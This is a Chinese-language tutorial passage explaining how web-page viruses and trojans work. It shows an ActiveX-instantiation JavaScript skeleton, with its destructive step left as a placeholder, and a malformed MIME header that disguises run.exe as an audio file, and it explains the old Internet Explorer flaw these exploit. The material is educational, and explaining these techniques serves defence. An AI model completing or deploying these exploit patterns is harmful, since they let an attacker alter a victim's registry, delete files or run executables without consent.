第二节 网页病毒、网页木马的运行机理分析
Ⅰ。javascript.Exception.Exploit
精华语句:
Functiondestroy(){
try
{
//ActiveXinitialization初始化ActiveX,为修改注册表做准备
a1=document.applets[0];
//获取applet运行对象,以下语句指向注册表中有关IE的表项
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl=a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance();
FSO=a1.GetObject();
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Net=a1.GetObject();
try
{
开始做坏事
}
}
catch(e)
{}
}
catch(e)
{}
}
functiondo()
{
//初始化函数,并每隔一秒执行修改程序
setTimeout("destroy()",1000);//设定运行时间1秒
}
Do()//坏事执行函数指令
全部是JS编写,没有什么高深的技术,但它却可以把你的计算机注册表改的是乱78糟,在你的计算机里留下各式各样的垃圾,甚至于连声招呼都不打就G了你的硬盘。所列出的整段函数看起来简单明了,声明函数,初始化环境,取得注册对象,执行读,写,删权限,定义*作时间(快得叫你连反映都没有)。
Ⅱ。错误的MIMEMultipurposeInternetMailExtentions,多用途的网际邮件扩充协议头。
精华语句:
Content-Type:multipart/related;
type="multipart/alternative";
boundary="====B===="
——====B====
Content-Type:multipart/alternative;
boundary="====A===="
——====A====
Content-Type:text/html;
Content-Transfer-Encoding:quoted-printable
——====A====——
——====B====
Content-Type:audio/x-wav;
name="run.exe"
Content-Transfer-Encoding:base64
Content-ID:——以下省略AAAAAN+1个——
把run.exe的类型定义为audio/x-wav,这下清楚了,这是利用客户端支持的MIME(多部分网际邮件扩展,MultipartInternetMailExtension)类型的漏洞来完成的。